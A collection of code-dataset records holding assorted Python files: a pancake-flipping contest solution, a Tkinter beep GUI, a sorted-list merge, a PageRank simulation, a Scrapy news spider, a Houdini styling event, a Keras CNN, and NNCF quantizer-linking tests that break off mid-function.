'-':\r\n return '+'\r\n else:\r\n return '-'\r\n\r\n \r\ndef flipPancakes(cakes, S):\r\n flips = 0\r\n while NotHappy(cakes):\r\n count = 0 #index of '-'\r\n cakes = list(cakes) #e.g. \"++--++\" --> [+,+,-,-,+,+]\r\n \r\n #iterate from left to right\r\n for cake in cakes:\r\n if cake == '-': #if there is '-', flip\r\n #check if can flip\r\n if count + S > len(cakes): #cannot flip\r\n return \"IMPOSSIBLE\"\r\n else: #flip\r\n for i in range(count,count+S):\r\n cakes[i] = flip(cakes[i])\r\n flips += 1\r\n count += 1\r\n\r\n return flips\r\n \r\n \r\nfilename = \"A-large.in\"\r\ninfile = open(filename, 'r')\r\nlines = infile.readlines()\r\n\r\ncases = []\r\nt = int(lines[0].strip('\\n'))\r\nfor i in range(1,t+1):\r\n cases.append(lines[i].strip('\\n').split(' ')) #e.g. [\"-+---+\", 4]\r\ninfile.close()\r\n\r\noutfile = open(\"A-large.out\", 'w')\r\n\r\ncaseNo = 1\r\nfor case in cases:\r\n result = flipPancakes(case[0],int(case[1]))\r\n outfile.write(\"Case #{}: {}\\n\".format(caseNo, result))\r\n caseNo += 1\r\n\r\noutfile.close()\r\n","sub_path":"solutions_python/Problem_199/3886.py","file_name":"3886.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"377727915","text":"from tkinter import *\r\nimport winsound\r\n\r\nbeeptimes = int(input('How many times do you want a beep to beep?: '))\r\n\r\ndef beepByTimes(freq, dur):\r\n for _ in range(beeptimes):\r\n winsound.Beep(freq, dur)\r\ndef bAaction():\r\n print('beep beep')\r\n beepByTimes(770, 150)\r\n messagebox.showinfo(\"Beep\", \"Beep Beep :)\")\r\ndef bBaction():\r\n print('high beep beep')\r\n beepByTimes(1500, 150)\r\n messagebox.showinfo(\"Beep\", \"Ouch, don't poke me like that! owowowowow\")\r\n\r\nwindow = Tk()\r\n\r\nbuttonA = Button(window, text='Click here', command=bAaction)\r\nbuttonB = Button(window, text='Dont click here', command=bBaction)\r\n\r\nbuttonA.pack()\r\nbuttonB.pack()\r\n","sub_path":"Python/beep_submit.py","file_name":"beep_submit.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"163772517","text":"def mergeSortedLists(lst1, lst2, lst3=[]):\n '''\n Objective : To merge two sorted lists.\n Input Parameters :\n lst1 : The first list containing sorted elements.\n lst2 : The second list containing sorted elements.\n Return :\n lst3 : The third list created by merging lst1 and lst2.\n '''\n \n if ( not lst1 and not lst2 ):\n return lst3\n elif ( lst1 and not lst2 ):\n lst3.extend(lst1)\n return lst3\n elif ( not lst1 and lst2):\n lst3.extend(lst2)\n return lst3\n else:\n if( lst1[0] < lst2[0] ):\n lst3.append(lst1[0])\n mergeSortedLists(lst1[1:], lst2, lst3)\n return lst3 \n else:\n lst3.append(lst2[0])\n mergeSortedLists(lst1, lst2[1:], lst3)\n return lst3\n\n#Test cases\nl1=[40, 50, 100, 200, 300]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=mergeSortedLists(l1,l2)\nprint('Merged List - ', l3)\n\nl1=[]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=[]\nl3=mergeSortedLists(l1,l2,l3)\nprint('Merged List - ', l3)\n\nl1=[0]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=[]\nl3=mergeSortedLists(l1,l2,l3)\nprint('Merged List - ', l3)\n\nl1=[100]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=[]\nl3=mergeSortedLists(l1,l2,l3)\nprint('Merged List - ', l3)\n\nl1=[25,79]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=[]\nl3=mergeSortedLists(l1,l2,l3)\nprint('Merged List - ', l3)\n\nl1=[4,5,23,40]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=[]\nl3=mergeSortedLists(l1,l2,l3)\nprint('Merged List - ', l3)\n\n\n","sub_path":"MCA-101-oops/Piazza/merge_lists.py","file_name":"merge_lists.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"164700908","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 29 12:36:01 2019\r\n\r\n@author: RUDRAJIT\r\n\"\"\"\r\n#importing libraries\r\nimport networkx as nx\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\n#Creating the Graph\r\nG=nx.gnp_random_graph(10,0.5,directed=True)\r\n#visualize\r\nnx.draw(G,with_labels=True)\r\nplt.show()\r\n\r\n#initializing points\r\npoints=[100 for x in range(G.number_of_nodes())]\r\n\r\n#distributing points\r\ndef distr_points(points,G):\r\n nodes=list(G.nodes())\r\n new_points=[0 for x in range(G.number_of_nodes())]\r\n for n in nodes:\r\n out=list(G.out_edges(n))\r\n if len(out)==0:\r\n new_points[n]+=points[n]\r\n else:\r\n share=points[n]/len(out)\r\n for (src,tgt) in out:\r\n new_points[tgt]+=share\r\n return new_points\r\n \r\ndef keep_distr(points,G):\r\n for i in range(1000):\r\n #while(1):363666666666\r\n new_points=distr_points(points,G)\r\n #print(new_points)\r\n points=new_points\r\n #stop=input(\"Press q to quit any other button to continue:-\")\r\n #if stop=='q':\r\n # break\r\n return new_points\r\n\r\n#New points after distribution\r\nnew_points=keep_distr(points,G)\r\ndict_counter={i:(new_points[i]/1000) for i in range(len(new_points))}\r\n#verifying with inbuilt function results\r\nresult=nx.pagerank(G)\r\nprint(sorted(dict_counter.items(),key=lambda f:f[1]))\r\nprint(\"\\n\")\r\nprint(sorted(result.items(),key=lambda f:f[1]))\r\n","sub_path":"Page Rank Algorithms/point_distribution_approach.py","file_name":"point_distribution_approach.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"298542907","text":"import scrapy\nfrom scrapy import Selector,Request\nfrom crawl.items.xinhua import XinHuaItem\nimport re,json\n\nclass XinHuaWangItem(scrapy.Spider):\n name = 'xhw'\n allowed_domains = []\n start_urls = ['http://qc.wa.news.cn/nodeart/list?nid=113352&pgnum=1&cnt=10&tp=1&orderby=1']\n\n def parse(self, response):\n rules = json.loads(response.text[1:-1])\n data = rules.get('data')\n data_list = data.get('list')\n for raw in data_list:\n url = raw.get('LinkUrl')\n # print(url)\n PubTime = raw.get('PubTime')\n title = raw.get('Title')\n # print(title)\n yield Request(url=url,callback=self.parse_content,meta={'PubTime':PubTime,'title':title})\n page_num = re.findall('pgnum=(\\d+)', response.url)[0]\n next_page = int(page_num) + 1\n next_p = re.sub('pgnum=(\\d+)', 'pgnum=' + str(next_page), response.url)\n yield Request(url=next_p, callback=self.parse)\n\n def parse_content(self,response):\n sel = Selector(response)\n # title = ''.join(bod.css('div.h-title::text').extract_first())\n # print(title)\n print(response.meta.get('title'))\n print(response.meta.get('PubTime'))\n tim = ''.join(sel.css('div.h-info span::text').re('\\d+-\\d+-\\d+\\s\\d+:\\d+:\\d+'))\n laiyuan = ''.join(sel.xpath('//div[@class=\"h-info\"]/span[2]//text()').extract())\n every = ''.join(sel.css('p::text').extract())\n zebian = ''.join(sel.css('span.p-jc::text').extract())\n print(laiyuan)\n print(every)\n print(zebian)","sub_path":"crawl/spiders/llvjie/xinhuawang.py","file_name":"xinhuawang.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"504746151","text":"\"\"\"This module contains an event to style nodes based on events.\"\"\"\n\n# =============================================================================\n# IMPORTS\n# =============================================================================\n\n# Houdini Toolbox Imports\nfrom ht.events.group import HoudiniEventGroup\nfrom ht.events.item import HoudiniEventItem\nfrom ht.events import NodeEvents\nfrom ht.nodes.styles.manager import MANAGER\n\n\n# =============================================================================\n# CLASSES\n# =============================================================================\n\n\nclass StyleNodeEvent(HoudiniEventGroup):\n \"\"\"Event to style Houdini nodes based on events.\"\"\"\n\n def __init__(self):\n super(StyleNodeEvent, self).__init__()\n\n self.event_map.update(\n {\n NodeEvents.OnCreated: HoudiniEventItem((self.style_node_on_creation,)),\n NodeEvents.OnNameChanged: HoudiniEventItem((self.style_node_by_name,)),\n }\n )\n\n # -------------------------------------------------------------------------\n # METHODS\n # -------------------------------------------------------------------------\n\n def style_node_by_name(self, scriptargs): # pylint: disable=no-self-use\n \"\"\"Style a node based on a name.\n\n :param scriptargs: Data passed by event runner.\n :type scriptargs: dict\n :return:\n\n \"\"\"\n node = scriptargs[\"node\"]\n\n MANAGER.style_node_by_name(node)\n\n def style_node_on_creation(self, scriptargs): # pylint: disable=no-self-use\n \"\"\"Style a node on creation.\"\n\n :param scriptargs: Data passed by event runner.\n :type scriptargs: dict\n :return:\n\n \"\"\"\n node = scriptargs[\"node\"]\n\n MANAGER.style_node(node)\n","sub_path":"python/ht/nodes/styles/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"408837746","text":"from keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.optimizers import SGD, Adadelta, Adagrad, Adam\nfrom keras.regularizers import l2 #, activity_l2\n\nnb_classes = 10\n# input image dimensions\nimg_rows, img_cols = 28, 28\ninput_shape = (img_rows, img_cols, 1)\n\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n","sub_path":"cnn_architecture2.py","file_name":"cnn_architecture2.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"473508364","text":"def run(data):\n record = sorted(data.splitlines())\n guards = {}\n cur_guard = ''\n for line in record:\n if '#' in line:\n cur_guard = line[26:].split(' ')[0]\n if cur_guard not in guards:\n guards[cur_guard] = {}\n elif 'asleep' in line:\n strt = int(line[15:17])\n elif 'wakes' in line:\n for i in range(strt, int(line[15:17])):\n guards[cur_guard][i] = guards[cur_guard].get(i, 0) + 1\n t = 0\n m = 0\n grd = ''\n for name, times in guards.items():\n for minu, cnt in times.items():\n if cnt > t:\n t = cnt\n grd = name\n m = minu\n return int(grd) * m\n","sub_path":"Python/04/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"477574502","text":"\"\"\"\n Copyright (c) Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nfrom collections import Counter\nfrom functools import partial\nfrom typing import List, Dict\n\nimport onnx\nimport pytest\nimport torch\nimport torch.nn\nfrom onnx import numpy_helper\n\nfrom nncf.dynamic_graph.graph import OperationExecutionContext, InputAgnosticOperationExecutionContext\nfrom nncf.dynamic_graph.trace_tensor import TensorMeta\nfrom nncf.nncf_network import InsertionInfo\nfrom nncf.quantization.algo import PatternBasedQuantizerSetupGenerator\nfrom nncf.quantization.layers import AsymmetricQuantizer\nfrom nncf.quantization.quantizer_id import NonWeightQuantizerId\nfrom tests.helpers import create_compressed_model_and_algo_for_test\nfrom tests.quantization.test_quantization_helpers import get_quantization_config_without_range_init\n\n\ndef make_op_exec_context_for_coalescing_test(scope_str: str) -> OperationExecutionContext:\n ia_op_exec_context = InputAgnosticOperationExecutionContext.from_str(scope_str)\n op_exec_context = OperationExecutionContext(ia_op_exec_context.operator_name,\n ia_op_exec_context.scope_in_model,\n ia_op_exec_context.call_order,\n [TensorMeta(0, 0, [1])])\n return op_exec_context\n\n\ndef make_insertion_info_for_coalescing_test(scope_str: str,\n linked_insertion_infos: List[InsertionInfo] = None,\n in_port_id: int = None)\\\n -> InsertionInfo:\n op_exec_context = make_op_exec_context_for_coalescing_test(scope_str)\n retval = InsertionInfo(op_exec_context, in_port_id=in_port_id)\n if linked_insertion_infos is not None:\n retval.link_insertion_infos(linked_insertion_infos)\n return retval\n\n\n@pytest.mark.parametrize(\"input_insertion_infos, linked_scopes_groups_list, ref_coalesced_insertion_infos\",\n # ref_coalesced_insertion_infos == None means that the coalescing should raise an exception\n [\n # 0 - Empty linked scopes list\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n )\n ],\n [],\n # Same as input\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n )\n ],\n ),\n # 1 - Linked scope only affects 1 operation\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n )\n ],\n [[\"Foo/Baz[bar]/conv2d_0\"]],\n # Same as input\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n )\n ]\n ),\n # 2 - Same as 1 but with multiple groups\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n )\n ],\n [[\"Foo/Baz[bar]/conv2d_0\"], [\"Foo/Xyz[leet]/__add___0\"]],\n # Same as input again\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n )\n ]\n ),\n # 3 - Single group affecting some of the scopes\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=1\n )\n ],\n [[\"Foo/Xyz[leet]/matmul_0\", \"Foo/Xyz[leet]/__add___0\", \"Foo/Baz[bar]/linear_0\"]],\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=1,\n linked_insertion_infos=[\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n ),\n ]\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n )\n ]\n ),\n\n # 4 - Multiple groups, each affecting one operation\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n ],\n [[\"Foo/Baz[bar]/linear_0\"], [\"Foo/Asdf[jkl]/softmax_0\"]],\n [\n # Same as input\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n ]\n ),\n\n # 5 - Multiple groups affecting multiple operations without overlapping\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_1\",\n in_port_id=0\n ),\n ],\n [[\"Foo/Baz[bar]/conv2d_0\",\n \"Foo/Baz[bar]/linear_0\"],\n [\"Foo/Asdf[jkl]/softmax_1\", \"Foo/Xyz[leet]/__add___0\"]],\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n linked_insertion_infos=[\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\",\n in_port_id=0\n ),\n ]\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_1\",\n in_port_id=0,\n linked_insertion_infos=[\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n ),\n ]\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n ]\n ),\n\n # 6 - A variation of 5\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\",\n in_port_id=0,\n ),\n ],\n [[\"Foo/Baz[bar]/conv2d_0\", \"Foo/Baz[bar]/linear_0\", \"Foo/Xyz[leet]/matmul_0\"],\n [\"Foo/Asdf[jkl]/softmax_0\", \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"]],\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n linked_insertion_infos=[\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\"\n )\n ]\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\",\n linked_insertion_infos=[\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\",\n in_port_id=0,\n ),\n ]\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n ),\n ]\n ),\n\n # 7 - Overlapping groups\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=1,\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"\n ),\n ],\n [[\"Foo/Baz[bar]/conv2d_0\", \"Foo/Baz[bar]/linear_0\", \"Foo/Xyz[leet]/matmul_0\"],\n [\"Foo/Xyz[leet]/matmul_0\",\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"]],\n None\n ),\n\n # 8 - More than 1 match for the operation specified in the group\n\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0,\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\",\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=1,\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"\n ),\n ],\n [[\"Foo/Baz[bar]/conv2d_0\", \"Foo/Xyz[leet]/matmul_0\"],\n [\"Foo/Xyz[leet]/matmul_0\",\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"]],\n None\n ),\n\n # 9 - No match for an operation specified in the group\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0,\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=1,\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"\n ),\n ],\n [[\"Foo/Baz[bar]/conv2d_0\", \"Foo/Xyz[leet]/matmul_1\"],\n [\"Foo/Xyz[leet]/matmul_0\",\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"]],\n None\n ),\n ])\ndef test_insertion_info_coalescing(input_insertion_infos: List[InsertionInfo],\n linked_scopes_groups_list: List[List[str]],\n ref_coalesced_insertion_infos: List[InsertionInfo]):\n if ref_coalesced_insertion_infos is None:\n with pytest.raises(RuntimeError):\n _ = PatternBasedQuantizerSetupGenerator.coalesce_insertion_infos(input_insertion_infos,\n linked_scopes_groups_list)\n else:\n test_coalesced_insertion_infos = PatternBasedQuantizerSetupGenerator.coalesce_insertion_infos(\n input_insertion_infos,\n linked_scopes_groups_list)\n assert Counter(test_coalesced_insertion_infos) == Counter(ref_coalesced_insertion_infos)\n\n\nclass QuantizerLinkingTestModel(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self._dummy_trainable_param = torch.nn.Parameter(torch.ones([1]))\n\n class Path(torch.nn.Module):\n def forward(self, input_1, input_2):\n retval0 = input_1 + input_2\n retval1 = retval0 * input_2\n retval2 = retval0 + retval1\n # __add___0, __mul___0, __add___1 results respectively\n return retval0, retval1, retval2\n\n self.path1 = Path()\n self.path2 = Path()\n\n def forward(self, input_1, input_2):\n path1_results = self.path1(input_1, input_2)\n path2_results = self.path2(input_1, input_2)\n return tuple(x + y for x, y in zip(path1_results, path2_results))\n\n\ndef test_quantizer_scale_linking():\n nncf_config = get_quantization_config_without_range_init(model_size=1)\n nncf_config['quantizer_setup_type'] = 'pattern_based'\n nncf_config[\"compression\"][\"quantize_outputs\"] = True\n nncf_config[\"compression\"][\"quantize_inputs\"] = False\n nncf_config[\"input_info\"] = [\n {\n \"sample_size\": [1, 1, 1, 1],\n },\n {\n \"sample_size\": [1, 1, 1, 1],\n }\n ]\n nncf_config[\"compression\"][\"activations\"] = {\n \"linked_quantizer_scopes\": [\n [\n # Note: Assuming that quantizers are attached as a post-op to the specified operation\n \"QuantizerLinkingTestModel/Path[path2]/__mul___0\",\n \"QuantizerLinkingTestModel/Path[path2]/__add___0\",\n ]\n ],\n \"ignored_scopes\": [\n # Ignore path output averaging operations\n \"QuantizerLinkingTestModel/__add___0\",\n \"QuantizerLinkingTestModel/__add___1\",\n \"QuantizerLinkingTestModel/__add___2\",\n ]\n }\n\n compressed_model, compression_ctrl = create_compressed_model_and_algo_for_test(QuantizerLinkingTestModel(),\n nncf_config)\n\n # 2 paths x 3 quantizers - 1 because two are shared in one path\n assert len(compression_ctrl.non_weight_quantizers) == 5\n\n test_input1 = torch.ones([1, 1, 1, 1])\n test_input2 = 2 * test_input1\n\n non_shared_mul_quantizer_id = NonWeightQuantizerId(\n InputAgnosticOperationExecutionContext.from_str(\"QuantizerLinkingTestModel/Path[path1]/__mul___0\"))\n\n non_shared_add_quantizer_id = NonWeightQuantizerId(\n InputAgnosticOperationExecutionContext.from_str(\"QuantizerLinkingTestModel/Path[path1]/__add___0\"))\n\n shared_quantizer_id = NonWeightQuantizerId(\n InputAgnosticOperationExecutionContext.from_str(\"QuantizerLinkingTestModel/Path[path2]/__add___0\"))\n\n non_shared_mul_quantizer = compression_ctrl.non_weight_quantizers[non_shared_mul_quantizer_id].quantizer_module_ref\n non_shared_add_quantizer = compression_ctrl.non_weight_quantizers[non_shared_add_quantizer_id].quantizer_module_ref\n shared_quantizer = compression_ctrl.non_weight_quantizers[shared_quantizer_id].quantizer_module_ref\n\n old_scale = 765.0 # so that the quantum is equal to 3\n with torch.no_grad():\n for quantizer in compression_ctrl.all_quantizations.values():\n quantizer.scale.fill_(old_scale)\n\n # Expected outputs without compression - 6, 12, 8. Scale deliberately set to preserve the values\n uncompressed_expected_outputs = (6.0 * torch.ones([1]), 12.0 * torch.ones([1]), 18.0 * torch.ones([1]))\n outputs_with_shared_scale_1 = compressed_model(test_input1, test_input2)\n\n for uncomp_out, comp_out_1 in zip(uncompressed_expected_outputs, outputs_with_shared_scale_1):\n assert torch.allclose(uncomp_out, comp_out_1)\n\n # Specifically clip the shared quantizer's outputs by setting scale to 1.0\n new_shared_scale = 1.0\n with torch.no_grad():\n shared_quantizer.scale.fill_(new_shared_scale)\n outputs_with_shared_scale_2 = compressed_model(test_input1, test_input2)\n\n # __add___0 outputs\n assert torch.allclose(outputs_with_shared_scale_2[0], 4.0 * torch.ones([1]))\n # __mul___0 outputs\n assert torch.allclose(outputs_with_shared_scale_2[1], 7.0 * torch.ones([1]))\n # __add___1 outputs\n assert torch.allclose(outputs_with_shared_scale_2[2], 12.0 * torch.ones([1]))\n\n # Clipping the non-shared quantizers at the same position in the path as the two shared ones\n # in the same manner is required to simulate the same grad input for both the shared quantizers\n # and the unshared ones\n with torch.no_grad():\n non_shared_mul_quantizer.scale.fill_(new_shared_scale)\n non_shared_add_quantizer.scale.fill_(new_shared_scale)\n final_output = compressed_model(test_input1, test_input2)[2]\n final_output.backward()\n\n assert torch.allclose(shared_quantizer.scale.grad,\n non_shared_mul_quantizer.scale.grad + non_shared_add_quantizer.scale.grad)\n\n\ndef test_unified_scales_for_vpu():\n nncf_config = get_quantization_config_without_range_init(model_size=1)\n nncf_config[\"compression\"][\"quantize_outputs\"] = True\n nncf_config[\"input_info\"] = [\n {\n \"sample_size\": [1, 1, 1, 1],\n },\n {\n \"sample_size\": [1, 1, 1, 1],\n }\n ]\n nncf_config[\"target_device\"] = \"VPU\"\n\n _, compression_ctrl = create_compressed_model_and_algo_for_test(QuantizerLinkingTestModel(),\n nncf_config)\n\n assert len(compression_ctrl.non_weight_quantizers) == 2\n\n total_quantizations = sum(\n [len(info.affected_insertions) for info in compression_ctrl.non_weight_quantizers.values()])\n assert total_quantizations == 8\n\n\nclass SimplerModelForUnifiedScalesTesting(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.conv2d_1 = torch.nn.Conv2d(1, 1, 1)\n self.conv2d_2 = torch.nn.Conv2d(1, 1, 1)\n self.conv2d_3 = torch.nn.Conv2d(1, 1, 1)\n self.conv2d_4 = torch.nn.Conv2d(1, 1, 1)\n\n def forward(self, x):\n in_1, in_2 = x.chunk(dim=-1, chunks=2)\n in_1 = self.conv2d_1(in_1)\n in_2 = self.conv2d_2(in_2)\n x = in_1 + in_2\n x = torch.cat([x, x], dim=-1)\n in_1, in_2 = x.chunk(dim=-1, chunks=2)\n in_1 = self.conv2d_3(in_1)\n in_2 = self.conv2d_4(in_2)\n x = in_1 * in_2\n return x\n\n\ndef test_unified_scales_are_identical_in_onnx(tmp_path):\n # pylint:disable=no-member\n 